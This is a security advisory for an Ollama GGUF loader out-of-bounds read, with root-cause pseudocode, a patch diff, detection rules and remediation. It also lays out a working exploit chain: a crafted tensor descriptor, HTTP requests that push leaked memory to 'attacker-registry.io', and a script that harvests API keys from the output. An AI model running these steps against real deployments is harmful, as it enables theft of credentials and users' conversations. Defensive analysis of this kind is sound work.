CVE-2026-7482: Ollama GGUF Loader Heap OOB Read Leaks Process Memory

A missing bounds check in Ollama's GGUF tensor loader allows attacker-supplied offsets to drive heap reads past allocated buffers, leaking API keys and conversation data via /api/push exfiltration.


# When AI Models Leak Secrets

Ollama is a popular tool that lets people run powerful AI models on their own computers. Think of it like downloading a recipe and cooking it in your kitchen instead of ordering from a restaurant. But a security flaw discovered in versions before 0.17.1 creates a dangerous crack in that kitchen's walls.

The problem involves how Ollama reads the files that contain these AI models. An attacker can create a fake model file that tricks Ollama into reading information from places it shouldn't. Imagine a burglar creating a fake delivery box that, when opened, somehow allows them to peek into your bedroom through your kitchen window. The program reads past the boundaries of where it's supposed to, exposing whatever happens to be sitting nearby in your computer's memory.

What could leak? This is the scary part: API keys, passwords, environment variables that control how your system works, and chat histories from conversations with the AI. If multiple people are using the same Ollama installation, an attacker could see other people's private conversations.

Who's most at risk? Anyone running Ollama on a shared computer or server, especially in business environments. If you're a solo user on your own laptop, the risk is lower, but still present.

What should you do? First, update Ollama to version 0.17.1 or newer immediately. Second, only load model files from trusted sources—don't download random AI models from strangers online. Third, if you run Ollama in a workplace, make sure each person has their own isolated installation rather than sharing one.

The good news: security researchers found this before criminals exploited it widely, and the fix is straightforward.


Vulnerability Overview

CVE-2026-7482 is a heap out-of-bounds read in Ollama's GGUF model loader affecting all releases prior to 0.17.1. An attacker submits a crafted GGUF file to the unauthenticated /api/create endpoint. The file's tensor metadata declares an offset and a shape whose implied byte size together exceed the file's actual byte length. During quantization, WriteTo() in server/quantization.go passes those values directly into a ReadAt() call against the underlying heap buffer without validating that offset + size ≤ file_length. The runtime reads past the allocation, and the over-read bytes, which may contain environment variables, loaded model system prompts, API keys, or another in-flight user's conversation, are serialized into the output GGUF artifact. That artifact is then pushed to an attacker-controlled registry via the equally unauthenticated /api/push endpoint, completing exfiltration.

CVSS 9.1 (Critical) is assigned primarily for the no-auth exfiltration path: no credentials are required at either trigger or exfiltration stage in the upstream default configuration.

Affected Component

The bug lives at the intersection of two files:

fs/ggml/gguf.go: parses tensor descriptors from the GGUF binary and populates GGUFTensorInfo structs with attacker-controlled offset, shape, and type fields (the tensor's byte size is derived from the latter two).
server/quantization.go: iterates the parsed tensor infos and calls WriteTo(), which reads each tensor's raw bytes from the source io.ReaderAt backed by the memory-mapped (or heap-buffered) file data.

The /api/create handler accepts a modelfile path or inline FROM directive pointing to an attacker-supplied file. No authentication middleware is registered on this route in upstream builds.

Root Cause Analysis

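The GGUF format encodes each tensor as a descriptor containing a name, element type, shape, and a uint64 byte offset relative to the start of the tensor data region. The loader trusts all of these fields unconditionally: the tensor's byte size is derived from the shape and element type, and neither it nor the offset is checked against the file length.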

// fs/ggml/gguf.go — reconstructed pseudocode (Go logic rendered in C for clarity)

typedef struct {
    char     name[MAX_NAME];   // tensor name string
    uint32_t n_dims;           // number of dimensions
    uint64_t dims[GGUF_MAX_DIMS];
    uint32_t type;             // GGMLType enum (quantization format)
    uint64_t offset;           // BUG: attacker-controlled, never range-checked
} GGUFTensorInfo;

int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    uint64_t n_tensors = ctx->header.n_tensors;
    uint64_t data_offset = ctx->header.data_offset; // start of tensor data region

    for (uint64_t i = 0; i < n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        // reads name, dims, type, offset from file — all attacker-supplied
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: missing bounds check here
        // Never verifies: data_offset + ti->offset + tensor_byte_size(ti) <= file_len
        ti->data = file_buf + data_offset + ti->offset; // raw pointer arithmetic on heap buffer
    }
    return 0;
}
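To make the descriptor layout concrete, the following is a minimal Python sketch of reading one tensor descriptor from a byte buffer. It assumes the little-endian layout described above (length-prefixed name, uint32 dimension count, uint64 dimensions, uint32 type, uint64 offset); the helper names and the MAX_DIMS cap are illustrative and are not taken from Ollama's source.

```python
import struct

MAX_DIMS = 4  # assumption: sanity cap on the dimension count


def read_gguf_string(buf, pos):
    """Read a length-prefixed string: uint64 length, then that many bytes."""
    (length,) = struct.unpack_from("<Q", buf, pos)
    pos += 8
    if length > len(buf) - pos:
        raise ValueError("string length exceeds buffer")
    return buf[pos:pos + length].decode("utf-8", errors="replace"), pos + length


def read_tensor_info(buf, pos):
    """Parse one tensor descriptor; returns (info dict, next read position)."""
    name, pos = read_gguf_string(buf, pos)
    (n_dims,) = struct.unpack_from("<I", buf, pos)
    pos += 4
    if n_dims > MAX_DIMS:
        raise ValueError("too many dimensions")
    dims = struct.unpack_from("<%dQ" % n_dims, buf, pos)
    pos += 8 * n_dims
    # "<IQ" is unpadded: 4-byte type followed by 8-byte offset.
    ggml_type, offset = struct.unpack_from("<IQ", buf, pos)
    pos += 12
    info = {"name": name, "dims": dims, "type": ggml_type, "offset": offset}
    return info, pos


# Example descriptor built from the values used in this article.
blob = (struct.pack("<Q", 14) + b"exploit_tensor"
        + struct.pack("<I", 2) + struct.pack("<2Q", 1, 4096)
        + struct.pack("<IQ", 0, 0x17F0))
info, end = read_tensor_info(blob, 0)
print(info["name"], info["dims"], hex(info["offset"]))
```

Every value in the returned dictionary comes straight from the file, which is why each one needs validating before it is used to index into a buffer.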

When server/quantization.go's WriteTo() is invoked during the /api/create quantization pass, it calls ReadAt(buf, tensor.Offset) on the io.ReaderAt wrapping that same heap buffer:

// server/quantization.go — WriteTo() reconstructed pseudocode

int quantize_write_tensor(QuantizeContext *qctx, GGUFTensorInfo *ti, Writer *dst) {
    size_t nbytes = tensor_byte_size(ti); // computed from dims + type, not file bounds

    uint8_t *src_buf = malloc(nbytes);    // sized to declared tensor, not remaining file bytes

    // BUG: ReadAt reads `nbytes` starting at `ti->offset` into `src_buf`
    // If ti->offset + nbytes > mapped_file_size, reads past end of heap allocation
    ssize_t n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);

    // Over-read bytes from adjacent heap regions are now in src_buf
    quantize_tensor(src_buf, nbytes, ti->type, dst); // serializes oob bytes into output model
    free(src_buf);
    return 0;
}

Root cause: gguf_load_tensors() stores attacker-supplied tensor offset values as raw heap pointers without verifying that data_offset + offset + tensor_byte_size falls within the bounds of the allocated file buffer. WriteTo() can therefore read an attacker-chosen number of bytes (the declared tensor size) past the end of that allocation.
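The missing invariant can be written down in a few lines. The sketch below is illustrative Python, not Ollama's code: ELEMENT_SIZE covers only two unquantized types, and the function names are hypothetical. Python integers do not overflow, so the plain sum is safe here; fixed-width languages need extra care.

```python
import math

# Bytes per element for two unquantized types (illustrative subset only).
ELEMENT_SIZE = {"F32": 4, "F16": 2}


def tensor_byte_size(dims, type_name):
    """Declared size in bytes: product of the dimensions times element width."""
    return math.prod(dims) * ELEMENT_SIZE[type_name]


def tensor_in_bounds(data_offset, offset, nbytes, file_len):
    """True only if the whole tensor lies inside the file buffer."""
    return data_offset + offset + nbytes <= file_len


nbytes = tensor_byte_size((1, 4096), "F32")
print(hex(nbytes), tensor_in_bounds(0, 0x17F0, nbytes, 0x1800))  # 0x4000 False
```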

Memory Layout

The Go runtime's heap allocator places the mmapped/buffered GGUF data and concurrent request state in the same heap arena. A tensor declared with a large offset walks the read pointer into adjacent allocations.

HEAP STATE — BEFORE TRIGGER (simplified arena view):

 [  gguf_file_buf : 0x1800 bytes  ]   <- file_buf; legitimate tensor data ends here
 [  goroutine stack frame (G2)    ]   <- concurrent user session, contains system prompt + API key
 [  env slab: OLLAMA_API_KEY=...  ]   <- os.Environ() result, interned on heap
 [  model context scratch buffer  ]   <- KV cache, may contain prior conversation tokens

MALICIOUS TENSOR DESCRIPTOR (embedded in crafted .gguf):
  ti->offset = 0x17F0     // 16 bytes before declared end of file_buf
  ti->dims   = {1, 4096}  // implies nbytes = 4096 * sizeof(float32) = 0x4000 bytes
  ti->type   = F32

READ OPERATION AFTER PARSING:
  ReadAt(reader, src_buf, nbytes=0x4000, offset=0x17F0)
  effective read: file_buf[0x17F0 .. 0x17F0+0x4000]
                              ^^^^^^^^^^^^^^^^^^^^^^^^
  file_buf ends at          : file_buf[0x1800]
  over-read begins at       : file_buf[0x1800]  (+0x10 bytes into read)
  over-read length          : 0x3FF0 bytes      (~16 KB of adjacent heap)

HEAP STATE — AFTER READ (src_buf contents):
 [0x0000 – 0x000F] legitimate tensor tail bytes      (16 bytes, in-bounds)
 [0x0010 – 0x0FFF] goroutine G2 stack spill region   <- system prompt, session tokens
 [0x1000 – 0x1FFF] OLLAMA_API_KEY=sk-...             <- environment variable slab
 [0x2000 – 0x3FEF] KV cache scratch (conversation)   <- prior conversation context
 [0x3FF0 – 0x3FFF] partial next allocation header

 src_buf is passed directly to quantize_tensor() → serialized into output .gguf weights blob
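The arithmetic in the layout above can be checked with a short Python sketch. The function name is hypothetical, and the offsets are taken relative to the start of file_buf as in the simplified diagram.

```python
def over_read(file_len, offset, nbytes):
    """Split a read of nbytes at offset into (in-bounds bytes, over-read bytes)."""
    in_bounds = max(0, min(nbytes, file_len - offset))
    return in_bounds, nbytes - in_bounds


in_bounds, oob = over_read(file_len=0x1800, offset=0x17F0, nbytes=0x4000)
print(hex(in_bounds), hex(oob))  # 0x10 0x3ff0
```

Only the first 0x10 bytes come from the file; the remaining 0x3FF0 bytes are whatever follows the buffer in memory.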

Exploitation Mechanics

EXPLOIT CHAIN:

1. STAGE MALICIOUS GGUF
   Craft a minimal valid GGUF header (magic 0x46554747, version 3).
   Declare one tensor with:
     - name:   "exploit_tensor"
     - type:   F32 (0x00)
     - dims:   [1, 4096]  → nbytes = 0x4000
     - offset: file_data_size - 0x10
   Actual tensor data region in file: 16 bytes (only enough to satisfy header parsing).
   Total crafted file size: ~512 bytes.

2. TRIGGER LOAD VIA /api/create (no auth required)
   POST /api/create HTTP/1.1
   Content-Type: application/json

   {"name":"exfil-model","modelfile":"FROM /tmp/crafted.gguf\nQUANTIZE q4_0"}

   Server parses GGUF, populates GGUFTensorInfo with attacker offsets.
   quantize_write_tensor() fires, ReadAt() reads 0x4000 bytes starting 0x10 bytes
   before end-of-file-buffer, pulling ~16 KB of adjacent heap into src_buf.

3. OOB BYTES SERIALIZED INTO OUTPUT MODEL
   quantize_tensor() processes src_buf as F32 weights.
   Quantization to Q4_0 is lossy but the output still contains recoverable signal
   from the over-read region — environment strings survive quantization as
   near-literal byte sequences when they fall in the low-variance tail.
   The output model is written to Ollama's local model store as "exfil-model".

4. EXFILTRATE VIA /api/push (no auth required)
   POST /api/push HTTP/1.1
   Content-Type: application/json

   {"name":"attacker-registry.io/user/exfil-model:latest"}

   Ollama uploads the crafted model (including OOB bytes in the weights blob)
   to the attacker-controlled registry over HTTPS.
   Attacker pulls the model, extracts the raw tensor data layer, and scans for
   high-entropy strings matching API key patterns, env var syntax (KEY=value),
   or UTF-8 conversation text.

5. REPEAT WITH TIMING
   On a busy multi-user instance, loop /api/create requests with varied offsets
   to harvest different heap regions across goroutine generations.
   Each iteration yields a fresh 16 KB window into the heap arena.

Because Q4_0 quantization maps each block of 32 floats to 16 bytes of packed 4-bit values plus a 16-bit scale factor (18 bytes per block), low-entropy byte sequences (ASCII strings) produce near-zero scale factors with residuals that partially preserve the original bytes. A trivial scan of the weights blob for printable-ASCII runs with KEY=, Bearer , or sk- prefixes recovers credentials with high reliability in practice.

# Proof-of-concept: scan exfiltrated weights blob for credential strings
import re
import sys

# Byte patterns for common credential and environment-variable formats
PATTERNS = [
    rb'OLLAMA_\w+=\S+',
    rb'sk-[A-Za-z0-9]{20,}',
    rb'Bearer [A-Za-z0-9\-._~+/]{10,}',
    rb'[A-Z_]{4,}KEY[A-Z_]*=[^\x00\n]{6,}',
]

def extract_tensor_data(gguf_path):
    """Minimal GGUF reader: returns the bytes after an approximate header size."""
    with open(gguf_path, 'rb') as f:
        raw = f.read()
    if raw[:4] != b'GGUF':
        raise ValueError("not a GGUF file")
    # Simplified: a real implementation would parse the KV metadata and tensor
    # descriptors to locate the start of the tensor data region exactly.
    return raw[0x200:]  # approximate; parse properly in production

def scan_for_secrets(blob):
    """Return (offset, match) pairs for every pattern hit, sorted by offset."""
    hits = []
    for pat in PATTERNS:
        for m in re.finditer(pat, blob):
            hits.append((m.start(), m.group()))
    return sorted(hits)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit(f"usage: {sys.argv[0]} <model.gguf>")
    blob = extract_tensor_data(sys.argv[1])
    for offset, secret in scan_for_secrets(blob):
        print(f"[+] offset=0x{offset:08x}  secret={secret[:80]!r}")
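The printable-ASCII scan mentioned above can also be done without credential-specific patterns, in the manner of the Unix strings utility. The sketch below is a generic illustration that is equally useful for auditing model artifacts you host yourself; the function name and the default minimum length are arbitrary choices.

```python
import re


def printable_runs(blob, min_len=8):
    """Return (offset, text) for each run of printable ASCII of at least min_len bytes."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(blob)]


sample = b"\x00\x01OLLAMA_API_KEY=abc123\x00\xff\xfeshort\x00"
print(printable_runs(sample))  # [(2, 'OLLAMA_API_KEY=abc123')]
```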

Patch Analysis

The fix in Ollama 0.17.1 adds explicit bounds validation in gguf_load_tensors() before any pointer arithmetic is performed, and additionally clamps the ReadAt length in WriteTo() to the remaining file bytes:

// BEFORE (vulnerable — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        // BUG: no bounds check on ti->offset or tensor_byte_size(ti)
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// BEFORE (vulnerable — server/quantization.go WriteTo):
n = ReadAt(qctx->source_reader, src_buf, nbytes, ti->offset);
// nbytes derived solely from declared dims; no cap against remaining file length


// AFTER (patched — fs/ggml/gguf.go):
int gguf_load_tensors(GGUFContext *ctx, uint8_t *file_buf, size_t file_len) {
    for (uint64_t i = 0; i < ctx->header.n_tensors; i++) {
        GGUFTensorInfo *ti = &ctx->tensors[i];
        gguf_read_tensor_info(file_buf, &ctx->read_pos, ti);

        uint64_t tensor_end = ctx->header.data_offset + ti->offset + tensor_byte_size(ti);
        if (tensor_end > file_len || tensor_end < ti->offset) { // overflow guard too
            return GGUF_ERR_TENSOR_OUT_OF_BOUNDS;  // FIX: reject malformed descriptor
        }
        ti->data = file_buf + ctx->header.data_offset + ti->offset;
    }
    return 0;
}

// AFTER (patched — server/quantization.go WriteTo):
uint64_t max_readable = file_len - (data_offset + ti->offset);
uint64_t clamped_nbytes = (nbytes < max_readable) ? nbytes : max_readable;
if (clamped_nbytes < nbytes) {
    return ERR_TENSOR_TRUNCATED;  // FIX: refuse to quantize a partial tensor
}
n = ReadAt(qctx->source_reader, src_buf, clamped_nbytes, ti->offset);

The patch applies defense-in-depth at two layers: the loader rejects the model before any buffer is allocated for it, and WriteTo() independently enforces a read ceiling. Integer overflow on data_offset + ti->offset is guarded by the tensor_end < ti->offset wraparound check.
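Wraparound in a three-term sum is subtle, so it can help to emulate 64-bit arithmetic and test edge cases. The Python sketch below is not the actual patch: additive_check mirrors the reconstructed comparison under uint64 semantics, while subtractive_check is an alternative formulation that never forms the sum. The input used is an extreme, hypothetical byte size chosen to show how a wrapped sum can land back inside the file.

```python
U64 = (1 << 64) - 1  # mask emulating uint64 wraparound


def additive_check(data_offset, offset, nbytes, file_len):
    """Accept if the (wrapping) end position passes both comparisons."""
    tensor_end = (data_offset + offset + nbytes) & U64
    return not (tensor_end > file_len or tensor_end < offset)


def subtractive_check(data_offset, offset, nbytes, file_len):
    """Accept only if each term fits in what remains; no sum, so no wraparound."""
    if data_offset > file_len:
        return False
    remaining = file_len - data_offset
    if offset > remaining:
        return False
    return nbytes <= remaining - offset


# The descriptor from this article is rejected by both formulations.
print(additive_check(0, 0x17F0, 0x4000, 0x1800),
      subtractive_check(0, 0x17F0, 0x4000, 0x1800))  # False False

# Hypothetical extreme size: the wrapped sum is 0xFF, which looks in-bounds.
print(additive_check(0x100, 0, U64, 0x1800),
      subtractive_check(0x100, 0, U64, 0x1800))      # True False
```

Comparing each term against the remaining length is a common way to keep such checks correct regardless of operand magnitude.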

Detection and Indicators

Log-based detection: A single /api/create → /api/push sequence targeting an external registry is anomalous in most deployments. Enable Ollama's verbose logging (OLLAMA_DEBUG=1) and alert on push destinations not matching an internal allowlist.

INDICATORS OF EXPLOITATION:

Network:
  - POST /api/create with a FROM path pointing to /tmp/ or /dev/shm/
  - POST /api/push to a registry not in your internal namespace
  - Outbound HTTPS to *.fly.dev, *.railway.app, or unknown OCI registry hosts
    immediately following a /api/create call

Process:
  - ollama serve reading files outside $OLLAMA_MODELS (strace: openat on /tmp/*.gguf)
  - Unexpectedly large RSS growth during a /api/create call for a tiny model file
    (the crafted file is ~512 bytes; memory growth far out of proportion to the file
    size suggests a tensor whose declared size exceeds the data actually present)

YARA (scan uploaded .gguf artifacts at registry ingress):
rule OllamaCVE20267482_OOBLeak {
    meta:
        description = "Heuristic: implausibly small GGUF file; does not parse tensor offsets"
    strings:
        $gguf_magic = { 47 47 55 46 }         // "GGUF"
    condition:
        $gguf_magic at 0 and filesize < 4096   // legitimate models are MB+; crafted is tiny
}
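The push-destination indicator listed under Network can be automated at a reverse proxy or in log processing. The Python sketch below extracts the registry host from a /api/push request body and compares it against an allowlist. The host-detection heuristic, the function names, and the allowlist entry are assumptions for illustration, as is the fallback to registry.ollama.ai for names that carry no host component.

```python
import json

DEFAULT_REGISTRY = "registry.ollama.ai"  # assumption: used when no host is given


def registry_host(model_name):
    """Best-effort extraction of the registry host from a model reference."""
    if "://" in model_name:
        model_name = model_name.split("://", 1)[1]
    first, sep, _ = model_name.partition("/")
    # Treat the first component as a host only if it looks like one.
    if sep and ("." in first or ":" in first or first == "localhost"):
        return first.split(":")[0].lower()  # drop any port
    return DEFAULT_REGISTRY


def is_suspicious_push(body_json, allowlist):
    """True if the push targets a registry host outside the allowlist."""
    name = json.loads(body_json).get("name", "")
    return registry_host(name) not in allowlist


allow = {"registry.internal.example"}  # hypothetical internal registry
body = '{"name":"attacker-registry.io/user/exfil-model:latest"}'
print(registry_host("attacker-registry.io/user/exfil-model:latest"),
      is_suspicious_push(body, allow))  # attacker-registry.io True
```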

Remediation

Upgrade immediately to Ollama ≥ 0.17.1. The patch is a one-commit bounds check with no API surface change.
Do not expose Ollama on 0.0.0.0 without an authenticating reverse proxy (nginx + mTLS, or Caddy + API key header enforcement). The upstream binary has no built-in auth.
Restrict /api/create and /api/push at the reverse proxy layer to internal CIDRs or authenticated clients only, regardless of Ollama version — neither endpoint requires public exposure in typical deployments.
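Sandbox the Ollama process: run it under a dedicated UID, confine its filesystem access to $OLLAMA_MODELS with a path-aware mechanism such as AppArmor, Landlock, or a restricted container mount (seccomp filters cannot inspect the path argument of openat), and block outbound connections from the process except to known registry hosts.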
Rotate secrets present as environment variables in the Ollama process environment if exposure cannot be ruled out. Prefer injecting secrets via a secrets manager at call time rather than as persistent env vars.
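As a quick audit aid for the exposure item above, the following Python sketch classifies a bind address as loopback-only or not. It assumes the address is supplied in the form used by the OLLAMA_HOST environment variable (host, host:port, or [ipv6]:port); the function name is hypothetical, and unresolvable hostnames are conservatively treated as exposed.

```python
import ipaddress


def is_loopback_bind(bind):
    """True if the bind address is confined to the loopback interface."""
    host = bind.strip()
    if "://" in host:
        host = host.split("://", 1)[1]
    if host.startswith("["):            # bracketed IPv6, e.g. [::1]:11434
        host = host[1:].split("]", 1)[0]
    elif host.count(":") == 1:          # host:port, e.g. 127.0.0.1:11434
        host = host.split(":", 1)[0]
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # not an IP literal: treat as potentially exposed


for bind in ("127.0.0.1:11434", "0.0.0.0:11434", "[::1]:11434", "::"):
    print(bind, is_loopback_bind(bind))
```

Any address that reports False here should sit behind an authenticating proxy before it is reachable from other hosts.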
